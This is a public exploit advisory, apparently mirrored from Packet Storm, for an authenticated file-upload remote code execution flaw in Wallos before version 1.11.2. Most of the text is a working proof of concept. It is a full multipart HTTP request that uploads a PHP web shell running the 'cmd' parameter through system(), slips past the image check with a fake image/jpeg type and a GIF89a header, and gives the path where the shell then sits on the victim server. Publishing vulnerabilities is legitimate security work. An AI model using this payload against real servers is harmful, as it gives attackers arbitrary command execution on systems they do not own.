Share
## https://sploitus.com/exploit?id=PACKETSTORM:177409
# Exploit Title: Wallos - File Upload RCE (Authenticated)  
# Date: 2024-03-04  
# Exploit Author: sml@lacashita.com  
# Vendor Homepage: https://github.com/ellite/Wallos  
# Software Link: https://github.com/ellite/Wallos  
# Version: < 1.11.2  
# Tested on: Debian 12  
  
Wallos allows you to upload an image/logo when you create a new subscription.  
This can be bypassed to upload a malicious .php file.  
  
POC  
---  
  
1) Log into the application.  
2) Go to "New Subscription"  
3) Upload Logo and choose your webshell .php  
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:  
  
--- SNIP -----------------  
  
POST /endpoints/subscription/add.php HTTP/1.1  
  
Host: 192.168.1.44  
  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  
  
Accept: */*  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Referer: http://192.168.1.44/  
  
Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324  
  
Origin: http://192.168.1.44  
  
Content-Length: 7220  
  
Connection: close  
  
Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light  
  
-----------------------------29251442139477260933920738324  
  
Content-Disposition: form-data; name="name"  
  
test  
  
-----------------------------29251442139477260933920738324  
  
Content-Disposition: form-data; name="logo"; filename="revshell.php"  
  
Content-Type: image/jpeg  
  
GIF89a;  
  
<?php  
system($_GET['cmd']);  
?>   
  
-----------------------------29251442139477260933920738324  
  
Content-Disposition: form-data; name="logo-url"  
  
----- SNIP -----  
  
5) You will get the response that your file was uploaded ok:  
  
{"status":"Success","message":"Subscription updated successfully"}  
  
  
6) Your file will be located in:   
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php